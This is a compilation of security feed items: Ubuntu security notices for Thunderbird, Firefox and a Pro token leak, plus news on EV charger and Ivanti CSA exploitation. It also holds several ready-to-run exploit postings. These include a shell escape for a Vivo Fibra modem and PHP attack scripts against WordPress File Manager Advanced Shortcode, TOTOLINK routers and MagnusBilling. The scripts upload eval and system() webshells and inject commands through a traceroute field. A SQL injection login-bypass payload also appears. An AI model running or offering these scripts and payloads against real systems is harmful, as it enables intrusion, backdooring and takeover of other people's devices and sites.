Ubuntu Security Notice 7066-1 - Damien Schaeffer discovered that Thunderbird did not properly manage certain memory operations when processing content in the Animation timelines. An attacker could potentially exploit this issue to achieve arbitrary code execution.

==========================================================================  
Ubuntu Security Notice USN-7066-1  
October 14, 2024

thunderbird vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Thunderbird could be made to crash or run programs if it opened a specially  
crafted file.

Software Description:  
- thunderbird: Mozilla Open Source mail and newsgroup client

Details:

Damien Schaeffer discovered that Thunderbird did not properly manage  
certain memory operations when processing content in the Animation  
timelines. An attacker could potentially exploit this issue to achieve  
arbitrary code execution.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS  
  thunderbird                     1:115.16.0+build2-0ubuntu0.22.04.1

Ubuntu 20.04 LTS  
  thunderbird                     1:115.16.0+build2-0ubuntu0.20.04.1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7066-1  
  CVE-2024-9680

Package Information:  
  https://launchpad.net/ubuntu/+source/thunderbird/1:115.16.0+build2-0ubuntu0.22.04.1  
  https://launchpad.net/ubuntu/+source/thunderbird/1:115.16.0+build2-0ubuntu0.20.04.1

Ubuntu Security Notice USN-7066-1

Ubuntu Security Notice 7063-1 - Marco Trevisan discovered that the Ubuntu Advantage Desktop Daemon leaked the Pro token to unprivileged users by passing the token as an argument in plaintext. An attacker could use this issue to gain unauthorized access to an Ubuntu Pro subscription.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

==========================================================================  
Ubuntu Security Notice USN-7063-1  
October 11, 2024

ubuntu-advantage-desktop-daemon vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- - Ubuntu 24.04 LTS  
- - Ubuntu 22.04 LTS  
- - Ubuntu 20.04 LTS  
- - Ubuntu 18.04 LTS  
- - Ubuntu 16.04 LTS

Summary:

Ubuntu Advantage Desktop Daemon could be made to expose sensitive information.

Software Description:  
- - ubuntu-advantage-desktop-daemon: Daemon to allow access to  
ubuntu-advantage via D-Bus

Details:

Marco Trevisan discovered that the Ubuntu Advantage Desktop Daemon leaked  
the Pro token to unprivileged users by passing the token as an argument  
in plaintext. An attacker could use this issue to gain unauthorized access  
to an Ubuntu Pro subscription. (CVE-2024-6388)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  ubuntu-advantage-desktop-daemon  1.11ubuntu0.1

Ubuntu 22.04 LTS  
  ubuntu-advantage-desktop-daemon  1.10.ubuntu0.22.04.2

Ubuntu 20.04 LTS  
  ubuntu-advantage-desktop-daemon  1.10.ubuntu0.20.04.1

Ubuntu 18.04 LTS  
  ubuntu-advantage-desktop-daemon  1.10.ubuntu0.18.04.1~esm1  
                                  Available with Ubuntu Pro

Ubuntu 16.04 LTS  
  ubuntu-advantage-desktop-daemon  1.10.ubuntu0.16.04.1~esm1  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7063-1  
  CVE-2024-6388

Package Information:  
  https://launchpad.net/ubuntu/+source/ubuntu-advantage-desktop-daemon/1.11ubuntu0.1  
  https://launchpad.net/ubuntu/+source/ubuntu-advantage-desktop-daemon/1.10.ubuntu0.22.04.2  
  https://launchpad.net/ubuntu/+source/ubuntu-advantage-desktop-daemon/1.10.ubuntu0.20.04.1  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEETB/nIDy9nvCSgAUj3gXQmO/Tr3wFAmcJXGoACgkQ3gXQmO/T  
r3yg3Q/+JzokSz0NaoKK0RJQRzLd3uVD1le+tjU7ceG92a8K2dMPeNLI7ppbcM1Y  
HwFkA0Ss08yinX5U6Frsz1obKpOKioJWc1GlMSAqXm/TxdG7GyrahIa8JG4tzViG  
ySwXij8EGa5DQEpzrooBm2OWTG4y2GR5Ls1zh0zXCagQLw+HrfcFDdqUr8GZX49e  
n5dEdSid3NQ0l6o9GFJ+9EljhCFMKK9J0ZohgeMdC1zGs3+bvA0N5Os0O1TWYBgB  
CPKv1Ho2rNrT2H//oxjS+Bo31xFoL62/IkVAxie80I+91/Pm3tuscsa8tTiiywGh  
azw3m7zapehfU+6megQU8ApRqHA1srEE8huL+Orq4/DjKzSDEsBz7CRCMxNyAipF  
EI4jDBVciV1oUBbs7TCjqtnNMB2SuY9Rk7LrenCQpHcK/5vtvplrs0sSUSF2yvuE  
yWYreCkx/dr11Qv+hK9ibgdFiiGTQNIERKERKQPPp1CXrsetzWFLRrIntA0jqkWE  
D/g5bFS30n8TDsBvK68Lagw35TUqvMfLHk+rvb+Gws5+QrpBgrl/iwF5rJZ3eopJ  
XDN4wnGAVrJXxXRoNLFtBVPGvD/Vmf7f3kWo131Q+8fNQa/At5hPN/nnYT3q9ZWJ  
ePjJmfCK3/sN1I2y8lcx5ahEKzpfJYmvon2aTs7Sag/U0/Gf1SA=  
=GNGa  
-----END PGP SIGNATURE-----

Ubuntu Security Notice USN-7063-1

The Vivo Fibra Askey RTF8225VW modem suffers from an input validation vulnerability that allows for full escalation to a functioning shell once logged in and using the restricted aspsh shell.

    ---# Exploit 1## Documentation on the Vivo Fibra Modem ExploitI discovered an exploit that allows access to the `sh` shell on the Vivo Fibra modem. This method essentially involves terminating the `aspsh` shell and invoking `sh` using the output of `cat /dev/null`. Using the pipe (`|`) is crucial for this exploit, it is the base of the exploit.## Known Affected Devices- **Model**: Askey RTF8225VW    - **Software Version**: BR_SG_g1.13_RTF_TEF004_V2.35    - **Revision**: REV3    - **CLI Version**: Reduced_CLI_HGU_v26 (Vivo Fibra firmware)    - **System Info**: Linux (none) 4.4.115  ## The ExploitTo begin, access the modem by connecting to `support@{modem's IP}` via SSH. It does not matter if the connection is local or public, as SSH port (22) is open to the internet. The `support` user has privileged access, but the password is the same as the admin password.You will need to enter the password, which is typically an 8-digit mix of letters and numbers. Once logged in, you will be greeted with `aspsh`, a very limited shell designed for technical services. Its purpose is to prevent you from using `sh` or `bash` for security reasons.The critical part begins here: the only Unix-like programs you can execute are `ls`, `top`, `cat`, and `free`. There are other programs available in `aspsh`, but they are not useful for this exploit.## How to Execute the ExploitIn `aspsh`, enter the following command:```aspshcat /dev/null | ps | grep aspsh```This command helps you discover the process ID of `aspsh -k`. The `cat /dev/null` command returns nothing, allowing you to execute `ps` and `grep aspsh`. The output should look something like this:```2298 support  13612 S    aspsh -k27492 support  13608 S    -aspsh31961 support   3308 S    sh -c cat /dev/null | ps | grep aspsh31964 support   3312 S    grep aspsh```Once you have identified the process ID, you can terminate the `aspsh` loop that restricts your access.Next, run the command:```aspshcat /dev/null | kill 2298 && sh```In this command, `cat /dev/null` still returns nothing, allowing you to use its output to kill the `aspsh -k` process. The `&& sh` part then invokes `sh` in its place.And that's it! You now have access to `sh`, providing you with unlimited possibilities for manipulating your modem.## Why This Exploit Is DangerousIf someone with malicious intent exploits this vulnerability, they could use tools like Wireshark or similar applications to monitor network activity. They could also execute destructive commands like `rm -rf /`, effectively destroying the system and rendering the hardware essentially unusable, with no option to reset it.---

Vivo Fibra Askey RTF8225VW Command Execution

Ubuntu Security Notice 7065-1 - Damien Schaeffer discovered that Firefox did not properly manage memory in the content process when handling Animation timelines, leading to a use after free vulnerability. An attacker could possibly use this issue to achieve remote code execution.

    ==========================================================================Ubuntu Security Notice USN-7065-1October 14, 2024firefox vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Firefox could be made to run programs as your login if it opened amalicious website.Software Description:- firefox: Mozilla Open Source web browserDetails:Damien Schaeffer discovered that Firefox did not properly manage memory inthe content process when handling Animation timelines, leading to a useafter free vulnerability. An attacker could possibly use this issue toachieve remote code execution.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  firefox                         131.0.2+build1-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-7065-1  CVE-2024-9680Package Information:  https://launchpad.net/ubuntu/+source/firefox/131.0.2+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-7065-1

NCC Group experts share details of how they exploited critical zero-day vulnerabilities in Phoenix Contact EV chargers (electric…

NCC Group experts share details of how they exploited critical zero-day vulnerabilities in Phoenix Contact EV chargers (electric vehicles chargers) at 44con, demonstrating the cybersecurity risks. Discover the technical details and consequences of the flaws.

A recent presentation by McCaulay Hudson and Alex Plaskett from NCC Group at the 44CON conference in London, England revealed critical security risks within **electric vehicle (EV) charging infrastructure.**

The researchers, who won $70,000 for hacking the Phoenix Contact CHARX SEC-3100 EV charger controller, have now provided details of exploiting multiple zero-day vulnerabilities to gain full control of the device. 

For your information, the vulnerabilities were discovered at the Pwn2Own Automotive 2024 event, a three-day contest organized by Trend Micro’s Zero Day Initiativezero-day-, held earlier this year and **reported** by Hackread.com. 

The CERT/VDE **advisory** VDE-2024-022 identified two vulnerabilities in Phoenix Contact CHARX SEC-3xxx charge controllers. One, a High severity vulnerability (CVE-2024-6788- CVSS score 8.6), allowed unauthorized access before the firewall was fully initialized, potentially disrupting the EV charger’s operation or gaining sensitive data. 

The second is a Medium severity vulnerability (CVE-2024-3913- CVSS score 7.5), allowing an attacker to reset the user-app account password, potentially granting elevated privileges to limited users. Despite the severity of the second vulnerability, it could still allow an attacker to gain unauthorized access and disrupt the device’s operation. 

Plaskett and Hudson spoke about how they successfully exploited vulnerabilities in the EV charger controller for the first time at **44Con** (PDF).

As per their **findings** (PDF), after a firmware update, the device reset the password for a pre-defined user account (“user-app”) to its default value (“user”), allowing them to gain initial access via SSH. By running a DHCP server, they could trick the device into switching from server mode to client mode, exposing additional attack vectors, uploading malicious scripts, and manipulating configuration settings. 

Researchers could chain together multiple seemingly **low-risk vulnerabilities** to escalate their impact and achieve code execution on the charger controller. Both vulnerabilities led to Remote Code Execution, granting them complete control over the charger. 

The compromised chargers have the potential for widespread attacks in real-world deployments, researchers noted. Attackers could exploit the flaws to shut down entire charging stations or launch **ransomware attacks**.

Moreover, attackers can deface charger displays, steal data from connected vehicles, integrate them into botnets for coordinated attacks, disrupt charging services through DoS attacks, and manipulate charging processes to steal electricity or commit payment fraud, researchers noted. 

Thankfully, the vulnerabilities have since been **patched.** However, researchers emphasize t the need for EV charging infrastructure manufacturers and operators to prioritize security, as the number of charging stations is expected to rise, necessitating robust protection.

1.  **Hacking Honda and Nissan Cars by Knowing VIN**
2.  **Leading EV Charging Firm Spills Customer Info in Server Leak**
3.  **Hackers Remotely Control Kia Cars by Exploiting License Plates**
4.  **Anonymous hacks EV charging station with pro-Ukraine message**
5.  **Researchers Hack Tesla Vehicles, Gain Control Over Paid Features**

Zero-day Flaws Exposed EV Chargers to Shutdowns and Data Theft

WordPress File Manager Advanced Shortcode plugin version 2.3.2 suffers from a code injection vulnerability that allows for remote shell upload.

    =============================================================================================================================================| # Title     : WordPress File Manager Advanced Shortcode 2.3.2 Code Injection Vulnerability                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://advancedfilemanager.com/product/file-manager-advanced-shortcode-wordpress/                                          |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 106 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass MetasploitModule {    private $targetUri;    private $webshellName;    private $wpData;    private $uploadPath;    private $postParam;    private $getParam;    public function __construct($targetUri, $webshell = null, $command = 'passthru') {        $this->targetUri = $targetUri;        $this->webshellName = $webshell ?: $this->generateRandomWebshellName();        $this->postParam = $this->generateRandomString();        $this->getParam = $this->generateRandomString();    }    private function generateRandomWebshellName() {        return bin2hex(random_bytes(rand(8, 16))) . '.php';    }    private function generateRandomString($length = 8) {        return bin2hex(random_bytes($length));    }    private function getFormData($pngWebshell) {        // Construct multipart form data        $boundary = md5(time());        $formData = "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n";        $formData .= "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n";        $formData .= "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n";        $formData .= "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n";        $formData .= "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"_fmakey\"\r\n\r\n{$this->wpData['fmakey']}\r\n";        $formData .= "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"path\"\r\n\r\n{$this->uploadPath}\r\n";        $formData .= "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"upload[]\"; filename=\"{$this->webshellName}\"\r\n";        $formData .= "Content-Type: image/png, text/x-php\r\n\r\n" . $pngWebshell . "\r\n";        $formData .= "--$boundary--\r\n";        return ['data' => $formData, 'boundary' => $boundary];    }    private function uploadWebshell($pngWebshell) {        $formData = $this->getFormData($pngWebshell);        $response = $this->sendRequest('POST', "/wp-admin/admin-ajax.php", $formData['data'], [            "Content-Type: multipart/form-data; boundary={$formData['boundary']}"        ]);        // Handle response and check for upload success        $responseData = json_decode($response, true);        if (isset($responseData['added'][0]['name']) && $responseData['added'][0]['name'] == $this->webshellName) {            return true;        }                return false;    }    private function injectPhpPayloadPng($payload) {        // Here you should inject PHP code into a PNG file        // This is just a placeholder for the actual implementation        return $payload; // Placeholder for the injected PNG    }    private function executeCommand($cmd) {        $payload = base64_encode($cmd);        $this->sendRequest('POST', "/{$this->wpData['baseurl']}/{$this->uploadPath}/{$this->webshellName}", [            $this->getParam => 'passthru', // replace with the command function            $this->postParam => $payload        ]);    }    private function sendRequest($method, $uri, $data, $headers = []) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $this->targetUri . $uri);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);        if ($method == 'POST') {            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        $response = curl_exec($ch);        curl_close($ch);        return $response;    }    public function exploit() {        // Check for vulnerabilities and upload webshell logic        $payload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";        $pngWebshell = $this->injectPhpPayloadPng($payload);        if ($this->uploadWebshell($pngWebshell)) {            $this->executeCommand('whoami'); // Replace 'whoami' with your desired command        } else {            echo "Failed to upload webshell.";        }    }}// Usage example$exploit = new MetasploitModule('http://target-uri.com');$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

WordPress File Manager Advanced Shortcode 2.3.2 Code Injectin / Shell Upload

TOTOLINK version 9.x suffers from a remote command injection vulnerability.

=============================================================================================================================================  
| # Title     : TOTOLINK 9.x Code Injection Vulnerability                                                                                   |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |  
| # Vendor    : https://www.totolink.net/                                                                                                   |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 71 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class TotolinkExploit {  
    private $targetUri;  
    private $sleepTime;

    public function __construct($targetUri, $sleepTime = 3) {  
        $this->targetUri = $targetUri;  
        $this->sleepTime = $sleepTime;  
    }

    // Function to send POST request and execute the command on the target  
    public function executeCommand($cmd) {  
        $num = rand(1, 500);  
        $url = $this->targetUri . '/cgi-bin/cstecgi.cgi';  
        $data = json_encode([  
            "command" => "127.0.0.1; {$cmd};#",  
            "num" => $num,  
            "topicurl" => "setTracerouteCfg"  
        ]);

        // Send POST request  
        return $this->sendPostRequest($url, $data);  
    }

    // Check if the target is vulnerable  
    public function check() {  
        echo "Checking if the target can be exploited.\n";

        // Test using echo command to see if it's vulnerable  
        $response = $this->executeCommand("echo test");  
        if (!$response || strpos($response, 'success') === false) {  
            return "Target is likely not vulnerable.\n";  
        }

        // Test command injection using sleep  
        echo "Performing command injection test with sleep of {$this->sleepTime} seconds.\n";  
        $start = microtime(true);  
        $this->executeCommand("sleep {$this->sleepTime}");  
        $elapsedTime = microtime(true) - $start;

        echo "Elapsed time: " . round($elapsedTime, 2) . " seconds.\n";  
        if ($elapsedTime >= $this->sleepTime) {  
            return "Target is vulnerable: Blind command injection successful.\n";  
        }

        return "Command injection test failed.\n";  
    }

    // Exploit the vulnerability to run the payload  
    public function exploit($payload) {  
        echo "Executing payload on the target.\n";  
        $this->executeCommand($payload);  
    }

    // Helper function to send POST requests  
    private function sendPostRequest($url, $postFields) {  
        $options = [  
            'http' => [  
                'method' => 'POST',  
                'header' => 'Content-Type: application/x-www-form-urlencoded',  
                'content' => $postFields  
            ]  
        ];  
        $context = stream_context_create($options);  
        return file_get_contents($url, false, $context);  
    }  
}

// Example of usage  
$targetUri = 'http://target-ip'; // Replace with actual target URL  
$exploit = new TotolinkExploit($targetUri);  
echo $exploit->check();  
$exploit->exploit('whoami'); // Replace with your payload

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

TOTOLINK 9.x Command Injection

MagnusBilling version 7.x suffers from a remote command injection vulnerability.

=============================================================================================================================================  
| # Title     : MagnusBilling 7.x Code Injection Vulnerability                                                                              |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |  
| # Vendor    : https://www.magnusbilling.org/                                                                                              |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 83 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class MagnusBillingExploit {  
    private $targetUri;  
    private $webShellName;

    public function __construct($targetUri) {  
        $this->targetUri = $targetUri;  
    }

    // Function to execute commands on the target  
    public function executeCommand($cmd) {  
        $url = $this->targetUri . '/lib/icepay/icepay.php?democ=/dev/null;' . $cmd . ';#';  
        return file_get_contents($url); // Send HTTP request  
    }

    // Function to execute PHP code on the target  
    public function executePhp($cmd) {  
        $payload = base64_encode($cmd);  
        $url = $this->targetUri . '/lib/icepay/' . $this->webShellName;  
        $postFields = [$this->postParam => $payload];  
        return $this->sendPostRequest($url, $postFields); // Send POST request  
    }

    // Upload backdoor webshell to the target  
    public function uploadBackdoorWebShell() {  
        // Name of the webshell to be uploaded  
        $this->webShellName = "backdoor.php"; // Set a specific name for the backdoor file

        // Backdoor PHP code (this allows execution of commands passed through a GET parameter 'cmd')  
        $backdoorCode = "<?php if(isset(\$_GET['cmd'])){system(\$_GET['cmd']);} ?>";

        // Encode the webshell content  
        $encodedPayload = base64_encode($backdoorCode);

        // Construct the command to upload the backdoor  
        $cmd = "echo {$encodedPayload} | base64 -d > ./{$this->webShellName}";

        // Execute the command to upload the backdoor  
        return $this->executeCommand($cmd);  
    }

    // Check if the target can be exploited  
    public function check() {  
        $url = $this->targetUri;  
        $response = file_get_contents($url);  
        if (!$response || !preg_match('/MagnusBilling/i', $response)) {  
            return "Safe: Likely not a MagnusBilling application.";  
        }

        $sleepTime = rand(4, 8);  
        $this->executeCommand("sleep {$sleepTime}");  
        sleep($sleepTime); // Simulate blind command injection

        return "Vulnerable: Command injection successful.";  
    }

    // Main function to exploit the target  
    public function exploit() {  
        echo "Uploading backdoor...\n";  
        $result = $this->uploadBackdoorWebShell();  
        if (!$result) {  
            die("Backdoor upload failed.");  
        }  
        echo "Backdoor uploaded at: {$this->targetUri}/lib/icepay/{$this->webShellName}\n";  
    }

    // Helper function to send POST requests  
    private function sendPostRequest($url, $postFields) {  
        $options = [  
            'http' => [  
                'method' => 'POST',  
                'header' => 'Content-Type: application/x-www-form-urlencoded',  
                'content' => http_build_query($postFields)  
            ]  
        ];  
        $context = stream_context_create($options);  
        return file_get_contents($url, false, $context);  
    }  
}

// Usage example  
$exploit = new MagnusBillingExploit('http://target-url/mbilling');  
$exploit->exploit();

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

MagnusBilling 7.x Command Injection

Bookstore Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Bookstore Management System v1.0 SQL injection Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202303/kashipara.com_bms-zip.zip                              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass : ' or 0=0 ##[+] hLOgin : http://127.0.0.1/BMS/admin/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Bookstore Management System 1.0 SQL Injection

A suspected nation-state adversary has been observed weaponizing three security flaws in Ivanti Cloud Service Appliance (CSA) a zero-day to perform a series of malicious actions.
That's according to findings from Fortinet FortiGuard Labs, which said the vulnerabilities were abused to gain unauthenticated access to the CSA, enumerate users configured in the appliance, and attempt to access the

Network Security / Vulnerability

A suspected nation-state adversary has been observed weaponizing three security flaws in Ivanti Cloud Service Appliance (CSA) a zero-day to perform a series of malicious actions.

That's according to findings from Fortinet FortiGuard Labs, which said the vulnerabilities were abused to gain unauthenticated access to the CSA, enumerate users configured in the appliance, and attempt to access the credentials of those users.

"The advanced adversaries were observed exploiting and chaining zero-day vulnerabilities to establish beachhead access in the victim's network," security researchers Faisal Abdul Malik Qureshi, John Simmons, Jared Betts, Luca Pugliese, Trent Healy, Ken Evans, and Robert Reyes said.

The flaws in question are listed below -

*   **CVE-2024-8190** (CVSS score: 7.2) - A command injection flaw in the resource /gsb/DateTimeTab.php
*   **CVE-2024-8963** (CVSS score: 9.4) - A path traversal vulnerability on the resource /client/index.php
*   **CVE-2024-9380** (CVSS score: 7.2) - An authenticated command injection vulnerability affecting the resource reports.php

In the next stage, the stolen credentials associated with gsbadmin and admin were used to perform authenticated exploitation of the command injection vulnerability affecting the resource /gsb/reports.php in order to drop a web shell ("help.php").

"On September 10, 2024, when the advisory for CVE-2024-8190 was published by Ivanti, the threat actor, still active in the customer's network, 'patched' the command injection vulnerabilities in the resources /gsb/DateTimeTab.php, and /gsb/reports.php, making them unexploitable."

"In the past, threat actors have been observed to patch vulnerabilities after having exploited them, and gained foothold into the victim's network, to stop any other intruder from gaining access to the vulnerable asset(s), and potentially interfering with their attack operations."

SQLi vulnerability exploitation

The unknown attackers have also been identified abusing CVE-2024-29824, a critical flaw impacting Ivanti Endpoint Manager (EPM), after compromising the internet-facing CSA appliance. Specifically, this involved enabling the xp\_cmdshell stored procedure to achieve remote code execution.

It's worth noting that the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog in the first week of October 2024.

Some of the other activities included creating a new user called mssqlsvc, running reconnaissance commands, and exfiltrating the results of those commands via a technique known as DNS tunneling using PowerShell code. Also of note is the deployment of a rootkit in the form of a Linux kernel object (sysinitd.ko) on the compromised CSA device.

"The likely motive behind this was for the threat actor to maintain kernel-level persistence on the CSA device, which may survive even a factory reset," Fortinet researchers said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#vulnerability